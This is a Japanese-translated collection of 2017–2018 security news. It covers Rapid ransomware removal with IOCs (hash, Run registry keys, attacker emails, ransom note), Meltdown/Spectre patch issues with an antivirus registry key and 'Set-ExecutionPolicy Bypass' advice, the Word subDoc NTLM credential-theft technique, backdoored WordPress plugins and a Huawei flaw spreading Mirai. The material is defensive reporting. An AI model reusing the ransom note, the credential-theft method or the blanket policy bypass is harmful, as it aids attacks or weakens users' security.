     Rapid身代金要求型マルウェアは、最初にコンピュータを暗号化した後も、実行を継続し、暗号化するための新しいファイルを監視し続けているので、可能な限り早急に、この身代金要求型マルウェアをシャットダウンすることは重要である。犠牲者がRapid身代金要求型マルウェアに感染させられたことを検出したら、即座にWindowsタスクマネージャを開き、この身代金要求型マルウェア関連プロセスを終了させなさい。
     そのコンピュータが未だ再起動させられていないのであれば、この実行プロセスは、何らかの名前を持っているかもしれない。例えば、我々のサンプルでは、rapid.exe と名付けられていた。そして、あなたは以下のスクリーンショットで、このプロセスを確認できる。実際の犠牲者は、稼働中にはこのファイル名を持っていない。そのコンピュータが既に再起動されているのであれば、この身代金要求型マルウェアのプロセスは、info.exe と名付けられているかもしれない。

    タスクマネージャ

     このプロセスを終了したら、msconfig.exeを起動し、このautorunsを無効にしなさい。あなたがWindowsタスクマネージャにアクセスできないのであれば、Safe Mode with Networking(セーフモードとネットワーク)でコンピュータを再起動し、そこからタスクマネージャにアクセスすることを試みなさい。

    Rapid身代金要求型マルウェアから自分自身を保護するには

     身代金要求型マルウェアから自分自身を保護するためには、適切なコンピュータ利用の習慣とセキュリティソフトウェアを使用することが重要である。真っ先に、あなたは、身代金要求型マルウェア攻撃のような緊急の場合に、復元可能な信頼性がありテスト済みのデータのバックアップを常に持っておかなければならない。
     あなたはまた、身代金要求型マルウェアと戦うために、シグネチャ検出やヒューリスティックだけではなく、挙動検出を組み込んであるセキュリティソフトを持たなければならない。例えば、Emsisoft Anti-MalwareMalwarebytes Anti-Malwareは共に、殆どではないにしても、多くの身代金要求型マルウェア感染によるコンピュータの暗号化を防御できる挙動検出を含んでいる。
     大事なことを言い忘れていたが、必ず、以下のセキュリティ習慣を実行しなさい。これは多くの場合に、先ず行うべき最も重要なステップである。

      ・ バックアップ、バックアップ、バックアップ!
      ・ 見知らぬ人からの添付ファイルを開くな
      ・ その人が実際にそれらを送信したことを確認するまで添付ファイルを開くな
      ・ VirusTotalのようなツールで添付ファイルをスキャンしなさい
      ・ Windowsアップデートが出現したら直ぐに、必ずWindowsアップデートを全てインストールしなさい。また、必ず全てのプログラムをアップデートしなさい。特にJava, Flash, Adobe Reader。古いプログラムは、マルウェアの配布者によって一般的に攻撃可能なセキュリティ上の脆弱性を含んでいる。従って、それらをアップデートすることは重要である
      ・ 必ず、挙動検出やホワイトリスト テクノロジを使用している何らかのセキュリティソフトウェアをインストールして使用するようにしなさい。ホワイトリスト化は、訓練という苦痛を伴うが、それを蓄えていく意思があるのなら、最大の見返りとなるだろう
      ・ 難解なパスワードを使用しなさい。そして、決して複数のサイトで同じパスワードを再利用しないようにしなさい

     身代金要求型マルウェアを防御するための完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomwareを参照しなさい。

    IOCs

    ハッシュ

    125c2bcb0cd05512391a695f907669b2f55a8b69c9d4df2ce1b6c9c5a1395b61

    Rapid身代金要求型マルウェア関連ファイル

    %AppData%\info.exe
    %AppData%\How Recovery Files.txt
    %AppData%\recovery.txt

    Rapid身代金要求型マルウェア関連レジストリエントリ

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Encrypter"="%AppData%\info.exe"
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "userinfo"="%AppData%\recovery.txt"

    Rapid身代金要求型マルウェアeMailアドレス

    frenkmoddy@tuta.io
    jpcrypt@rape.lol
    support@fbamasters.com
    unlockforyou@india.com
    rapid@rape.lol
    fileskey@qq.com
    fileskey@cock.li

    Rapid身代金要求型マルウェア脅迫文

    Hello!
    All your files have been encrypted by us
    If you want restore files write on e-mail - frenkmoddy@tuta.io


    MeltdownとSpectreのパッチはインストールするな。Intelはシステム再起動を増加させるだろうと警告している
    Fossbytes : Security (2018/01/23)
     今月初旬、Intelは、数日中に5年前のマシンの凡そ90%を修正するだろうと約束した。しかし、このパッチ自体は、ユーザのコンピュータに再起動の問題を残したままにすることで問題を増加させた。
     現在、Intelは、新しい投稿でこの問題に取り組んでおり、彼らが何らかの解決策を見つけ出すまで、MeltdownとSpectreバグ用に現在利用可能になっているセキュリティパッチをインストールしないようにユーザにアドバイスしている。
     「我々は、OEM、クラウドサービス プロバイダ、システム製造業者、ソフトウェア企業、エンドユーザが、現在のバージョンの配備を中止することを推奨する。これは、予期していた以上の再起動と他の想定外のシステム挙動を導くかもしれないからである」と、Intelの執行役員副社長Navin Shenoyは警告している。
     Shenoyはまた、彼らがBroadwellとHaswellに関するルート問題を発見したと発言している。彼らは、修正の早期バージョンを彼らのOEMパートナーとこの週末にかけてテストし、セキュリティフィックスの最終バージョンをリリースすることになる。彼らはまた、Ivy Bridge, Sandy Bridge, Skylake, Kaby Lakeアーキテクチャに基づく他の影響を受けるチップに関してもセキュリティパッチを作業中である。MeltdownとSpectreパッチはIntel用には問題を発生しない。
     数日前、Microsoftは、AMDベース システムを搭載するユーザのマシンでブートできない問題た発生した後、AMDベース システム用のパッチを停止しなければならなかった。Canonicalが今月、Ubuntu Linux用の修正をリリースした時、似たようなことが発生した。


    Microsoftは、あなたのアンチウィルスがレジストリキーを設定しない限り、もはやWindowsセキュリティアップデートは受け取ることができないと発言している
    BleepingComputer : News>Security (2018/01/09)
     Microsoftは、アンチウィルス製品と最近のWindows MeltdownとSpectreパッチとの間での互換性がないことを説明しているサポートページ上に新たに大変重要な詳細を追加した。
     今週追加された更新情報によると、Microsoftは、Windowsユーザが利用しているアンチウィルス プログラムがWindows MeltdownとSpectreパッチと互換しない限り、2018年1月の定例のセキュリティアップデートや、その後の如何なる定例のパッチも受け取ることはないだろうと発言している。
     アンチウィルス プログラムが互換性を持つための方法は、彼らの製品をアップデートし、Windowsレジストリに特別なレジストリキーを追加することである。
     このレジストリキーの存在が、Windows OSに、アンチウィルス製品が互換していることを告げ、最先端のCPU 中の緊急のフローを解決するためのMeltdownとSpectreパッチをインストールするWindowsアップデートの引き金になる。

    レジストリキーは、ユーザが将来のアップデートに関して適格であるか否かを決定する

     Microsoftの最新のポリシーの変更によると、このレジストリキーは、Windowsアップデートプロセスの永久的なチェックになっており、(【訳者追加】 このレジストキーが設定されていないのであれば)MeltdownとSpectreパッチだけでなく、将来の全てのアップデートを妨げるだろう。
     Microsoftは、テスト中に一部のアンチウィルス製品が、その後のブートアップを妨げるBlue Screen of Death(BSOD)エラーをWindowsコンピュータに発生させることを検出したために、アンチウィルス企業に、このレジストリキーを作成するよう要請している。
     セキュリティ研究者Kevin Beaumontは、本日早く、Mediumブログ ポストでこれが発生した理由を説明している。

     アンチウィルス ベンダの一部は、システムコールを妨害するために使用するハイパーバイザー(【訳注】 コンピュータの仮想化技術のひとつである仮想機械(バーチャルマシン)を実現するための制御プログラム(Weblioより))を挿入することでKernel Patch Protection(カーネル・パッチ・プロテクション。【訳注】 Microsoft Windowsの64ビット版が持つ、カーネルへのパッチの適用を妨ぐ機構で、一般にはPatch Guard (パッチ・ガード)の名称で知られる(Wikipediaより))をバイパスするテクニックを使用し、メモリロケーション(Meltdownの修正で現在変化しているメモリロケーション)に関して憶測を立ていることに問題がある。率直に言うと、このテクニックの一部は、ルートキットで使用されているテクニックと類似のものである。事実、Kernel Patch Protectionは、ルートキットと戦うために10年前にMicrosoftによって導入された。一部のアンチウィルス ベンダが大変疑問の余地のあるテクニックを使用しているために、彼らは結局システムに‘blue screen of death’(言い換えるなら、再起動ループ)を発生させることになる。

     MeltdownとSpectre脆弱性は、最先端のプロセッサ設計中の基本的なフローを目立たせた。Microsoftが先週配備した修正は、アンチウィルス ソフトが現在Windows OSと相互作用している方法に関して類似の影響を生成している。
     アンチウィルスを使用していないWindowsユーザ、あるいは、Windows Defenderを使用しているWindows ユーザは、彼らがレジストリキーの要求に服従しなくていいので、今すぐアップデートする必要がある。唯一影響を受ける人々は、カスタム(サードパーティ製アンチウィルス)を使用している人々である。
     大多数のアンチウィルス ベンダは、MeltdownとSpectreパッチをサポートするように彼らの製品をアップデートしたが、ベンダの一部は、ユーザにレジストリキーを手動で設定するように要求している。
     Beaumontによると、アンチウィルス企業は、彼らの顧客の一部が他の企業のアンチウィルスソフトウェアと一緒に稼働していることを承知しているために、これが発生しているとしている。このために、彼らは、他のアンチウィルスがMeltdownとSpectreパッチ用にアップデートされていない間に、レジストリキーを設定することで偶然にBSODを発生させる事を望んでいない。
     言い換えれば、シッチャカメッチャカである。

    レジストリキーは、そのうちに問題を引き起こすかもしれない

     Beaumontは、このレジストリキーを作成しているアンチウィルス製品、ユーザに手動でこのレジストリキーを作成するように要請しているアンチウィルス製品、未だアップデートしておらず、Windows MeltdownとSpectreパッチと現在非互換であるアンチウィルス・ソフトウェアを追跡し続けてきた
     Bleeping Computerは、Windowsユーザーベースの大半は多分この「レジストリキーの要求」によって影響を受けないと信じている。
     でも、今後数ヶ月、ユーザがセキュリティアップデートを受け取っていないことに気が付いたなら、彼らが最初に注目すべきは、アンチウィルスである。
     ユーザはまた、Beaumontのリストを閲覧し、念の為に彼らの現在のアンチウィルスが、MeltdownとSpectreパッチと互換していることを確かめるべきである。

    ユーザはアンチウィルスにもう少し時間を与えるべき

     アンチウィルス製品やユーザがレジストリキーを設定するまで全てのWindowsセキュリティアップデートを停止することに関しては、Microsoftは基本的に2つのことを発言している。
     (1) ユーザは、現在のアンチウィルスのままで、Windowsセキュリティアップデートの受信を停止するか、
     (2) 彼らの現在非互換のアンチウィルスを放棄し、MeltdownとSpectreのための重大な修正をサポートするアンチウィルスにする。
    かの何れかであると発言している。
     ユーザは、今直ぐに現在のアンチウィルスを見捨てることを急ぐべきではない。先週のステートメントで、Microsoftは、アンチウィルス企業がアップデートをリリースするまでに少し時間がかかるかもしれないとと発言し、辛抱するようにユーザにアドバイスしている。このアップデートは大変複雑であり、一般的なソースコードの一行の修正ではない。
     アンチウィルス製品が設定する必要のあるレジストリキーは以下である。

    Key="HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96-b7fb-a231484277cc" Type="REG_DWORD”

     Bleeping Computerは、ユーザがダブルクリックすることで、そのPCにこのレジストリキーを作成する .reg ファイルを作成した。ユーザは、彼らのアンチウィルス ベンダが、このレジストリキーを手動でインストールするようにユーザに告げているのであれば、ユーザは、このファイルを使用することができる。WindowsコンピュータをMeltdownとSpectreパッチでアップデートする詳細情報は、ここで得られる。


    Microsoft WordのsubDoc機能は、Windows認証を盗むために悪用されている
    BleepingComputer : News>Security (2018/01/05)
     アメリカに本拠を置くサイバーセキュリティ企業Rhino Labsのセキュリティ研究チームは、悪意ある者達がsubDocと呼ばれるあまり知られていないMicrosoft Wordの機能を使用して、NTLMハッシュ(ユーザアカウント認証を格納している標準フォーマット)を渡すことでWindowsコンピュータを欺くことができることを発見した。
     このテクニックの核心は、数年間知られている古典的なNTLM pass-the-hash攻撃(【訳注】 攻撃者がパスワードを利用して認証するのではなく、パスワードのハッシュ値を利用して認証を突破する攻撃の事(図解サイバーセキュリティ用語より))である。Rhino Labsによると、違っていることは、Wordファイルを「マスタードキュメントからサブドキュメントにロードする」ことを可能にするsubDocと呼ばれるWordの機能を介して、これが実行されることにある。

    subDoc攻撃の動作方法

     Rhino Labsのエキスパートは、攻撃者は悪意あるサーバからサブドキュメントを読み込み、Wordファイルを組み立てることができると発言している。
     攻撃者は、このリクエストのもう一つの末端に悪意あるSMBサーバをホストすることができ、要求されるサブドキュメントを提供する代わりに、インチキのドメインの認証に必要とされるNTLMハッシュを渡すことで犠牲者のPCを欺いている。
     NTLMハッシュをクラックし、Windows認証を取得するためにオンラインで利用可能な多くのツールが存在している。攻撃者は次に、これらのログインを使用して、オリジナルのユーザを装い、犠牲者のコンピュータやネットワークにアクセスすることができる。この種のハッキングは、高い価値をもつターゲット(企業や政府機関)を目標とするスピアフィッシング キャンペーンに理想的である。

    subDocは、DDE、数式エディタ等に仲間入りした

     この攻撃は、セキュリティ研究者Juan Diegoやセイバーセキュリティ企業DefenceCodeによって説明されているように、NTFSハッシュを渡してWindowsを欺くためにSCFファイルやSMBリクエストを使用するような他のテクニックに多少類似している。
     これはまた、あまり知られていないMicrosoft Word機能を悪用した最初の攻撃方法ではない。他のテクニックは、Microsoft Dynamic Data Exchange機能(DDE、【訳注】 動的データ交換。WindowsやOS/2環境下において、複数のアプリケーションソフトウェア間で通信を行う技術(Wikipediaより))や、古いOffice数式エディタの使用を含んでいる。
     現在subDoc攻撃の検出には問題がある。
     「この機能は悪意ある行動のための攻撃ベクトルとして公に認識されていないので、アンチウィルスソフトウェアによって認識されない」と、VirusTotal上のアンチウィルスエンジンの全てが、subDocメソッドを介して兵器化したWordドキュメントを検出しなかった事を強調して、Rhino Labsは発言している。
     Microsoftは、マルウェア配布者からの繰り返される悪用に起因して、最近Word中のDDEサポートを無効化した。subDocの運命は、この機能が通常のマルウエアの配布キャンペーンに役に立っていないことと、DDE攻撃されているMicrosoftが注目していないことから不明である。
     Rhino Labsはまた、subDocで兵器化したWordファイルを生成するためのツールをリリースしているので、システム管理者やセキュリティ研究者は、独自のテストを実行することができる。このツールは、SubDoc Injectorと名付けられており、GitHubで利用可能である、そして、現在Rhino Labsの一部門であり以前のLulzSecのメンバー、Hector "Sabu" Monsegur(【訳注】 ヘクター・ザビエル・モンセガー。アメリカ人のハッカー、通称「Sabu」。アノニマスAnonOpsグループ出身のハッカーで、アノニマスから分裂したLulzSec(ライズセック)のリーダーと目される(Wikipediaより))によって生み出された。Rhono Labsはまた、subDoc攻撃のステップ・バイ・ステップでの再現性付きの技術投稿を公開した。


    MeltdownとSpectre CPUフローに関してWindowsシステムをチェックしアップデートする方法
    BleepingComputer : News>Security (2018/01/04)
     我々が以前記事を公開し、MicrosoftがMeltdownとSpectre CPUフローを解決する定例外のWindowsアップデートをした今日まで、我々は、これらのパッチをインストールする際の説明とサポートに関するノンストップの要請を受けてきた。
     社説形式の記事は、おそらくアドバイスを与える最善のフォーマットではないだろう。そこで、我々は、これらのアップデートを取得する方法と、Microsoftのあまりにも複雑なアナウンスを舵取りする方法に関して、単純、極めて易しく、一歩々々の記事にするつもりである。
     我々が、この情報を収集するために使用した4つのMicrosfotヘルプページがある。そして、これらのページをあなたは読みたいかもしれない。念の為に:(リンクは日本語サイトに変更していますが、一部英文のままのページもあります)

     これら全てのページでの最も主要で重要な声明は以下である。

     非互換のアンチウィルス アプリケーションによって発生するストップ・エラーを防止するために、Microsoftは、彼らのソフトウェアが、2018年01月のWindowsオペレーティング・システムのセキュリティアップデートと互換していることが確認されているメーカーのアンチウィルス ソフトを実行しているデバイスのためにだけ、Windowsセキュリティ アップデート(2018年01月03日にリリース)を提供している。

    これは何を意味しているのか?

     あなたのWindowsオペレーティング・システムのWindows Updateセクションに進み、「更新プログラムの確認」を押した時に、何かが現れた場合には、あなたは、それをインストールしても安全であることを意味している。
     Windowsアップデート パッケージ(KB番号)は、ここで利用可能である。あなたのオペレーティングシステムとハードウェア プラットフォームに応じて様々なKB番号が表示されるだろう。
     何も現れなかった場合は、Windowsが、あなたのシステム上に非互換のアンチウィルスソフトの存在を検出したことを意味している。

    アンチウィルス プログラムでの全体的混乱

     Microsoftは、テストしている間に、MeltdownとSpectreパッチのインストレーション後、コンピュータのブートを妨げBSOD(死のブルースクリーン)を発生させるアンチウィルス プログラムを幾つか検出したと発言している。
     Microsoftは、アンチウィルス ベンダに、彼らの製品を修正し、製品を確認したりアップデートしたりした時に、顧客のコンピュータ上にレジストリキーを作成するように指示したと、そうしなければ、Meltdown/Spectreアップデート後にWindows PCはクラッシュすると発言している。
     Microsoftは現在、ユーザがWindowsをアップデートする時は常に、アップデートシステムがユーザのPCのそのレジストリキーをチェックするだろうと発言している。
     このキーが存在している場合、Windowsアップデートプロセスは、そのアンチウィルスソフトがMeltdownとSpectreパッチをサポートするためのアップデートを受け取っていると確信し、適切なOSアップデートをインストールするだろう。
     これは事態を厄介にしている。一部のアンチウィルス企業は、レジストリキーを作成する計画はないと発言し、一部は、このキーの作成は技術的にできないと発言している。それ以外の企業は後日アップデートを出荷するだろう。  このGoogleドキュメントファイルは幾つかのアンチウィルス企業の対応リストを含んでいる。
     簡潔に言えば、殆どのアンチウィルス企業は製品のアップデートとレジストリキーの自動的な追加を約束しているので、殆どすべてのユーザは待つことになる。
     これに取り組む最も簡単な方法は、あなたが毎日Windows Updateセクションに行き、「更新プログラムの確認」ボタンを押すしかない、そして、あなたのアンチウィルス製品が、そのレジストリキーを作成した後、そのアップデートを受け取るだろう。
     あなたのアンチウィルス企業が、そのレジストリキーの追加を計画していない不幸な人の一人であるのなら、これが、あなたに代わって以下のレジストリキーを自動的に作成するためにBleeping Computerが作成した .reg ファイルである。

    Key="HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96-b7fb-a231484277cc" Type="REG_DWORD”

    我々は、これを目立たせるために赤字で表示する。あなたのアンチウィルス ベンダがMeltdownとSpectreパッチと互換するAVベンダである事を確認した場合にのみ、この .reg ファイルを実行しなさい。

     あなたが、このファイルを実行したり、このレジストリキーを手動で追加すると、あなたのPCは、MeltdownとSpectre用のパッチを受け取るだろう。

    パッチの状態をチェックする方法

     Microsoftはまた、あなたのPCにこのアップデートが適切にインストールされているか否かをチェックする、あるいは、追加のファームウェアアップデートをあなたが必要としているか否かをチェックするために使用することのできる一連のPowerShellワンライナー(気の利いた寸評)をリリースしている。

     PowerShellを起動する時、必ず管理者権限で起動しなさい、そこで、要求されるモジュールをインストールすることができる。

     以下のPoserShellコマンドは、MeltdownとSpectreフローをテストするためのPoserShellモジュールをダウンロードしインストールする。

    Install-Module SpeculationControl

     あなたが、このコマンドを実行し実行エラーを得た場合、あなたのPowerShell実行ポリシーを調整する必要があるかもしれない。以下のコマンドを実行しなさい。

    Set-ExecutionPolicy Bypass

     これで、あなたのシステムを実際にチェックする二つ目のPowerShellコマンドを実行できる。

    Get-SpeculationControlSettings

     Googleは、全てのCPUがMeltdownとSpectreフローに対する脆弱性があるわけではないが、その結果が、沢山の赤字で表示したように見えたなら、あなたのCPUとOSは、これらの攻撃に対して脆弱性がある。十中八九、このコマンドの結果は、以下のようになると、発言している。


    パッチ前(画像をクリックすると拡大します)

     次のステップは、あなたがMeltdown/Spectreパッチを受け取るまで「更新プログラムの確認」ボタンを押すことである。上述の説明のように、これは、「問題のある」アンチウィルス ソフトウェアを使用している一部ユーザに関しては数日かかるかもしれない。


    MeltdownとSpectreパッチに関するWindows Update(画像をクリックすると拡大します)

     このアップデートの後、もう一度 Get-SpeculationControlSettings コマンドを実行する必要がある。可能なシナリオが二つある。
     最も一般的なシナリオは以下の結果になる。


    パッチした後、更にファームウェアのアップデートが必要とされる(画像をクリックすると拡大します)

     この画像は、あなたのシステムがMeltdownバグ用のパッチを受け取ったが、Spectreバグに関しては不完全なパッチを受け取ったことを意味している。  GoogleがSpectreは脆弱性攻撃することも難かしいがパッチすることも難かしいと昨日発言したように、これは予期されていたことである。
     赤字のテキストが意味していることは、あなたが追加のチップセット ファームウェア アップデートを必要としていることである。MicrosoftとGoogleは、OEMは、Windows OSレベルのSpectreパッチを完成するために、これらの追加ファームウェア アップデートをユーザに提供する必要があると発言している。あなたのコンピュータの年代に応じて、一部のOEMは、これらのファームウェア アップデートを利用可能にしないかもしれない。これは、あなたが不完全なSpectreパッチのまま固定されることを意味している。
     あなたのラップトップ/デスクトップ/サーバ ベンダが臨時のファームウェアアップデートを提供しているのであれば、その公式サイトからアップデートを取得し、インストールすることで、パッチを完了することができる。
     全てが上手く行っているのであれば、全てのチェックは、緑色に色付けられたテキストで表示されるだろう。以下のように。


    MeltdownとSpectreパッチが達成されている場合(画像をクリックすると拡大します)

     上図のように、出力が全て緑であり、各アイテムがTrueに設定されているなら、あなたは、これらの攻撃から保護されている。


    MicrosoftがMeltdownとSpectre CPUフローの緊急アップデートをリリースした
    BleepingComputer : News>Security (2018/01/04)
     昨晩遅く、Microsoftは、MeltdownとSpectre(1995年以降にリリースされた殆どすべてのCPUに影響を与えると言われている二つのセキュリティフロー)を解決する定例外のアップデートをリリースした。
     Microsoftは、来週の月例アップデートまでこのアップデートをリリースする計画はなかったが、Googleがこの二つの脆弱性に関する詳細を公開したので、修正をリリースすることを強いられた。
     Microsoftのセキュリティアドバイザリ(リンクは日本語サイトに変更しています)によると、これらはMeltdownとSpectreフローを解決する様々なWindowsディストリビューション用のWindowsセキュリティ アップデートである。

    【訳注】 以下の表中のリンクはMicrosoftの日本語サイトに変更していますが、現時点(2018/01/04 22:20)で英文のままです。

                      
    オペレーティング・システムのバージョン アップデート KB
    Windows Server, version 1709 (Server Core Installation) 4656892
    Windows Server 2016 4056890
    Windows Server 2012 R2 4056898
    Windows Server 2012 適用外
    Windows Server 2008 R2 4056897
    Windows Server 2008 適用外

     このMicrosoftアップデートは全面的な修正ではない。Windows PCの一部は、Spectre攻撃を緩和するための追加のCPUファームウェア アップデートを要求するかもしれないが、このMicrosoftアップデートは、Meltdownフローを完全に解決すると思われる。

    アンチウィルスソフトの一部での問題は、BSOD(死のブルースクリーン)に導くかもしれない

     しかし、Microsoftはまた、MeltdownとSpectreセキュリティフィックスが、アンチウィルス製品の一部とは互換しないと警告している。
     「我々のテストプロセスの間、我々はサードパーティ アプリケーションの一部が、Windowsカーネルメモリにサポートされていないコールを実行し、ストップ・エラー(BSODとして知られる)を発生する事が明らかになった」と、Microsoftは、昨日のセキュリティフィックスに関する互換ノートで発言している。
     「これらのコールは、このデバイスがブートすることを不可能にする(中略)ストップ・エラーを発生するかもしれない。非互換のアンチウィルス アプリケーションによって発生するストップ・エラーを防止するために、Microsoftは、彼らのソフトウェアが、2018年01月のWindowsオペレーティング・システムのセキュリティアップデートと互換していることが確認されているメーカーのアンチウィルス ソフトを実行しているデバイスのためにだけ、2018年01月03日にリリースしたWindowsセキュリティ アップデートを提供している。」
     「あなたが、このセキュリティアップデートを提供されていないのであれば、あなたは非互換のアンチウィルスソフトを稼働している可能性がある。そして、あなたは、そのソフトウェアのベンダをフォローしなければならない」と、Microsoftは発言している。
     また、現実世界において、MeltdownもしくはSpectre攻撃を使用している悪意あるグループの報告はないので、Microsoftは、ユーザが、アンチウィルス ベンダに彼らの製品をアップデートするためのより多くの時間を与えることを推奨している。
     アンチウィルス ベンダがMeltdownとSpectreパッチをサポートするために彼らの製品をアップデートした時、彼らは、OS上にカスタム レジストリキーを作成するように指示されており、これは、Windowsが適切なセキュリティフィックスをダウンロードし受け取ることを可能にするだろうと、Microsoftは発言している(ユーザもそれに同意した場合)。
     他のベンダもまた、パッチを発行している。あなたは、ここで完全なリストを発見することができる。


    数百のサイトが、バックドア化されたWordPressプラグインを3年経っても使っている
    BleepingComputer : News>Security (2017/12/26)
     14のWordPressプラグインのソースコードの内部に意図的な悪意あるコードの存在が明らかになって数年、専門家は、数百のサイトがブービートラップされたコンポーネントを依然として使用していると警告している。
     2016年10月下旬、White Fir Designのセキュリティ研究者達は、攻撃者にWordPressサイト上でリモートコードの実行を可能にする14のプラグイン内部の奇妙なコードの存在について公に警告した。
     「このコードは、正当な目的を持っているようには見えず、おそらく、意図的に悪意を持たせたものであることを示していた」と、専門家は発言している。

    悪意あるプラグインは2014年にWordPressサイトから削除された

    White Firは、この14のプラグインと、同じ悪意あるコードを発見したThomas Hambach(香港に居住するWeb開発者)の2014年のブログポストを関連付けた。
     Hambachは、ハイジャックされたサイトにSEOスパムリンク(【訳注】 SEOは、検索エンジン最適化のこと。裏技を使って検索順位をあげようとする行為がSEOスパム)を挿入するために悪意あるコードを使用し、このサイトのURLや、その他の詳細を攻撃者にeMailしていた。
     WordPressチームは、Hambachの発見に続いて介入し、2014年2月までに彼が発見したプラグインを削除した。そして、2014年後半までに、WordPressは、公式のWordPressプラグイン・ディレクトリから14の悪意あるプラグイン全てを削除した。
     WordPressチームのアクションの後も、WordPressは、2015年中、バックドア化されたプラグインに特有の悪意あるコードにアクセスしようとしている様々なIPアドレスからのリクエストを検出し続けていた

    数百のWordPressサイトはバックドア化されたプラグインを使用し続けていた

     これらの過去の攻撃は、最近になって再び脚光を浴びた。WordPressプラグイン・ディレクトリは、ダウンロード オプションが無効にされていたとはいえ、閉じられた古いプラグインのページは可視のまま存在するように変更されていた。いままで、これらのページは公にはアクセスできなかった。
     故意に悪意あるコードを特徴とした以前の全てのプラグインのページは、WordPressチームがパブリックダウンロードから、これらのプラグインを削除してほぼ3年経ってさえ、それらを使用している数百のサイトが存在していることを示している。


    バックドア化されたコードを特徴にしていた14のプラグインの一つ

                                                    
    プラグイン名 アクティブ インストール
    return-to-top 50以上
    page-google-maps 500以上
    gallery-slider 300以上
    g-translate 60以上
    share-buttons-wp 200以上
    mailchimp-integration 10未満
    smart-videos 70以上
    seo-rotator-for-images 70以上
    ads-widget 40以上
    seo-keyword-page 200以上
    wp-handy-lightbox 500以上
    wp-popup 10未満
    google-analytics-analyze 70以上
    cookie-eu 10未満

     これらのプラグインを使用しているサイトの全てが、何を探すべきかを認識しているあらゆるハッカーによってハッキングされる可能性がある。これらのサイトは十中八九見捨てられ、長く忘れられたプロジェクトである。これはWeb最大の問題の一つであり、"Website rot"(【訳注】 ROTは、Redundant(冗長), Outdated(期限切れ), Trivial(些末)コンテンツの頭文字(TechRepublicより))としても知られる。

    WordPressは意のままに使えるオプションを制限した

     マルウェアの配布などに乱用される可能性のある簡単にハッキングできるサイトからユーザを保護するために、一部の専門家は、セキュリティ上の理由から、プラグインが公式のWordPressプラグイン・ディレクトリから削除された時に、WordPressチームがサイトの所有者に警告することを提案している。
    WordPressのスタッフ達は、これはWordPressのサイトに多大なリスクをもたらすと発言し、このアイデアを即座に拒否した。
     「脆弱性悪用プログラムが存在し、我々がパッチ無しにその事実を公開したなら、我々はよりリスクを負うことになる」と、「我々が脆弱性があることを知らせたなら、(殆どの)ハッカーは全員を攻撃する。我々が誰にも告げなければ、認識しているハッカーが攻撃することになるだろうが、いずれにせよ、彼らは攻撃するだろう」と、WordPressチームのメンバーMika Epsteinは発言している
     しかし、専門家たちは、この解決策に納得しておらず、一部の人は、WordPressスタッフ達が、影響を受けるサイトから脆弱性のあるプラグインを削除するための押し付けがましいステップを採るべきであると主張している。
     この提案での問題は、ハッカーからサイトをセーフガードすることと、プラグインと間接的な幾つかの機能を削除することによって一部のWebサイトの機能を破壊するというモラルと法とのジレンマを作成したことである。
     このような議論の後一年経って、WordPressチームは、30万を超えるサイトに影響を与えた他のバックドア化されたWordPressプラグインのケースを公開したので、WordPressチームは、別の道を選択したように見える。
     差し当たり、一部のメジャーなセキュリティ脅威を撃退するために、WordPress開発者は、悪意あるプラグイン変更を同一のプラグインの最新のクリーンなバージョンに戻すかのようである。そして、WordPressチームは、新しいアップデートとしてパックし、影響を受ける全てのサイトにそれを強制インストールするだろう。この方法で、あらゆるメジャーな脆弱性もしくはバックドアは削除されるが、サイトの機能は、そのまま保たれる。この行動方針は、WordPressチームから貴重な時間を奪い、メジャーなセキュリティ問題だけを配備することになる。
     一方、サイト所有者は、WordPressプラグイン・ディレクトリで利用可能な多くのセキュリティプラグインの一つをインストールできる。そして、セキュリティフローを特徴とする古いプラグインに関して彼らのサイトを監査することができる。


    Huawei(ファーウェイ)のルータ脆弱性は、Miraiの変種を拡散するために使用されている
    Kaspersky : ThreatPost (2017/12/22)
     研究者達はファーウェイのホームルータ モデルに脆弱性を特定した。アドバイザリでの説明によると、この脆弱性は、OkikuもしくはSatoriと呼ばれるMiraiマルウェアの変種を拡散するために使用されている。
     Check Pointの研究者達は、火曜日にレポートを公開し、このフローがファーウェイのルータモデルHG532に存在していると発言している。このレポートは、オンライン上でこの脆弱性を悪用しようとする数十万の企てを追跡中であると発言している。
     OkikuもしくはSatoriは、11月23日にCheck Pointの研究者達によって最初に同定された。この発見に先立って、研究者達は、ファーウェイHG252デバイスへの立て続けの攻撃を世界中(米国、イタリア、ドイツ、エジプトが最も激しく攻撃されている)で観察したと発言している。
     「この発見が確認されると直ぐに、この脆弱性は、さらなる増殖を軽減するために個別にファーウェイに通知された」と、研究者達は発言している。
     金曜日、ファーウェイは、この脆弱性(CVE-2017-17215)を警告するために顧客に対してアップデートされたセキュリティ通知を発行した。このフローは、脆弱性のあるルータ上でリモートコードを実行するために、ポート37215に悪意あるパケットを送信することをリモートの敵に可能にすると顧客に告げている。
     このMiraiボットネットは、DNSプロバイダDynKrebs on SecurtiyのWebサイトを巨大なDDoS攻撃のターゲットにしたことで、2016年10月にトップニュースになった。オリジナルのMiraiマルウェアは、CCTVとDVRハードウェア中に発見されたDefaultのTelnet認証を使用することを可能にするフローを悪用した。
     Miraiのソースコードが公に利用可能になって以来、多くのハッカーは、このコードを改竄し、IoT(Internet of Things)デバイスをセキュリティ侵害する数を増やしてきた。殆どのハッカーは、接続されたデバイスと埋め込まれたシステムまわりの手抜きの防御を悪用していた。
     OkikuもしくはSatoriの場合、Check Pointの研究者達は、"Nexus Zeta"の名で通っている経験不足のハッカーが、この攻撃の背後にいるのではないかと疑っている。
     「この攻撃者の身元は当初謎であり、先進国加害者説から悪名高い脅威集団に至るまで推測された」と、研究者達は発言している。
     「偶々、このボットネットに属しているC&Cドメインへの登録に使用されているeMailアドレス(nexusiotsolutions[.]net)を発見したおかげで、我々は主犯("Nexus Zeta"のニックネームで脅威を与えている「役者」)に到達した」と、彼らは発言している。
     次に研究者達は、ドメイン登録用に使用されたeMailアドレスとHackForumsと呼ばれる人気のあるハッカーフォーラムで使用されているeMailアドレスとを相互参照した。
     「彼はそのようなフォーラムでは滅多に参加していないが、その幾つかは、彼がアマチュアの「役者」を明らかにするものであり、興味ある彼の最新の焦点は、MiraiのようなIoTボットネットを確立するためのイニシアチブに関するものであった」と、研究者達は発言している。
